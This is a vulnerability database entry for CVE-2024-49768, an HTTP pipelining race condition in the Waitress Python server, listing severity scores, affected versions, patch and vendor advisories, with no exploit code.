CVE-2024-49768Time-of-check Time-of-use (TOCTOU) Race Condition in Waitress

CWE-367Time-of-check Time-of-use (TOCTOU) Race ConditionCWE-444HTTP Request Smuggling9 documents7 sources
Severity
4.8MEDIUMNVD
CNA9.1
EPSS
0.6%
top 31.29%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
2
Agendaless WaitressPylons Waitress
Timeline
PublishedOct 29
Latest updateNov 19

Description

Waitress is a Web Server Gateway Interface server for Python 2 and 3. A remote client may send a request that is exactly recv_bytes (defaults to 8192) long, followed by a secondary request using HTTP pipelining. When request lookahead is disabled (default) we won't read any more requests, and when the first request fails due to a parsing error, we simply close the connection. However when request lookahead is enabled, it is possible to process and receive the first request, start sending the err

CVSS vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:NExploitability: 2.2 | Impact: 2.5

Affected Packages2 packages

NVDagendaless/waitress2.0.03.0.1
CVEListV5pylons/waitress>= 2.0.0, < 3.0.1

Patches

Patch: github.com

🔴Vulnerability Details

5
OSV
Waitress vulnerabilities2024-11-19
CVEList
Waitress has request processing race condition in HTTP pipelining with invalid first request2024-10-29
GHSA
Waitress has request processing race condition in HTTP pipelining with invalid first request2024-10-29
OSV
Waitress has request processing race condition in HTTP pipelining with invalid first request2024-10-29
OSV
CVE-2024-49768: Waitress is a Web Server Gateway Interface server for Python 2 and 32024-10-29

📋Vendor Advisories

3
Ubuntu
Waitress vulnerabilities2024-11-19
Red Hat
waitress: python-waitress: request processing race condition in HTTP pipelining with invalid first request2024-10-29
Debian
CVE-2024-49768: waitress - Waitress is a Web Server Gateway Interface server for Python 2 and 3. A remote c...2024
CVE-2024-49768 — Agendaless Waitress vulnerability | cvebase